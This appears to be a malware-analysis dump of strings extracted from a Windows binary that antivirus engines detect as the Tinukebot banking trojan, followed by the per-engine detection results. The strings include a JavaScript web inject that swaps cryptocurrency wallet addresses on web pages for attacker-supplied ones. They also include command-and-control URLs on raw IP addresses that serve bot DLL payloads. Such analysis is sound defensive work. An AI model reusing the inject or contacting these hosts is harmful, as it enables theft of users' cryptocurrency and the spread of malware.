"inject": "<script>function replaceAllAddresses(newAddresses) { const btcRegexes = [ /\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34})\\b/g, /\\b((bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39})\\b/g ]; const ethRegexes = [ /\\b0x[a-fA-F0-9]{40}\\b/g ]; const ltcRegexes = [ /\\b(L|M|ltc1)[a-zA-HJ-NP-Z0-9]{25,39}\\b/g ]; const trxRegexes = [ /\\b(T|t)[a-zA-HJ-NP-Z0-9]{33}\\b/g ]; document.querySelectorAll('*').forEach(el => { el.childNodes.forEach(node => { if (node.nodeType === Node.TEXT_NODE) { btcRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.btc); }); ethRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.eth); }); ltcRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.ltc); }); trxRegexes.forEach(regex => { node.textContent = node.textContent.replace(regex, newAddresses.trx); }); } }); if (el.classList) { el.classList.forEach(className => { if (className.toLowerCase().includes('qrcode')) { el.clas
}
]
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVregex_error@std@@
.?AV_Locimp@locale@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
http://185.81.68.156/bin/bot.dll
http://176.113.115.149/bin/bot.dll
Kernel32.dll
KernelBase.dll
http://176.113.115.149/bin/bot64.dll
176.113.115.149
185.81.68.156
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
r/data.php
((((( H
h(((( H
H
- floating point support not loaded
- not enough space for arguments
- not enough space for environment
- abort() has been called
- not enough space for thread data
- unexpected multithread lock error
- unexpected heap error
- unable to open console device
- not enough space for _onexit/atexit table
- pure virtual function call
- not enough space for stdio initialization
- not enough space for lowio initialization
- unable to initialize heap
- CRT not initialized
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- not enough space for locale information
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- inconsistent onexit begin-end variables
DOMAIN error
SING error
TLOSS error
runtime error
Runtime Error!
Program:
<program name unknown>
Microsoft Visual C++ Runtime Library
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
LC_ALL
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
kernel32.dll
(null)
USER32.DLL
american
american english
american-english
australian
belgian
canadian
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
dutch-belgian
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
french-belgian
french-canadian
french-luxembourg
french-swiss
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
irish-english
italian-swiss
norwegian
norwegian-bokmal
norwegian-nynorsk
portuguese-brazilian
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
swedish-finland
america
britain
england
great britain
holland
hong-kong
new-zealand
pr china
pr-china
puerto-rico
slovak
south africa
south korea
south-africa
south-korea
trinidad & tobago
united-kingdom
united-states
CONOUT$
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Tinukebot.4!c
Elastic malicious (high confidence)
ClamAV Win.Malware.Tinukebot-10040717-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win64.NetLoader.dh
ALYac Gen:Variant.Cerbu.235503
Cylance Unsafe
Zillya Clean
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:Win64/Tinukebot.25b8555d
K7GW Trojan ( 005b7b321 )
K7AntiVirus Trojan ( 005b7b321 )
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win64/Tinukebot.N
APEX Clean
Avast Win64:BankerX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky UDS:Trojan.Win32.Generic
BitDefender Gen:Variant.Cerbu.235503
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Cerbu.235503
Tencent Win32.Trojan.Generic.Kqil
Sophos Harmony Loader (PUA)
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Cerbu.235503
TrendMicro TROJ_GEN.R002C0XB525
McAfeeD Real Protect-LS!245749553E71
Trapmine malicious.high.ml.score
CTX dll.trojan.generic
Emsisoft Gen:Variant.Cerbu.235503 (B)
Ikarus Trojan.Win64.Tinukebot
FireEye Generic.mg.245749553e719463
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Fortinet W64/Tinukebot.N!tr
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft Win32.Trojan.Generic.a
Gridinsoft Trojan.Win64.Banker.sa
Xcitium Clean
Arcabit Trojan.Cerbu.D397EF
SUPERAntiSpyware Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Inject.R690977
Acronis Clean
McAfee Artemis!245749553E71
TACHYON Clean
VBA32 Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0XB525
Rising Trojan.Tinukebot!8.E873 (TFE:5:LbNvixlb26G)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData Gen:Variant.Cerbu.235503
AVG Win64:BankerX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan:Win/Tinukebot.N
No IRMA results available.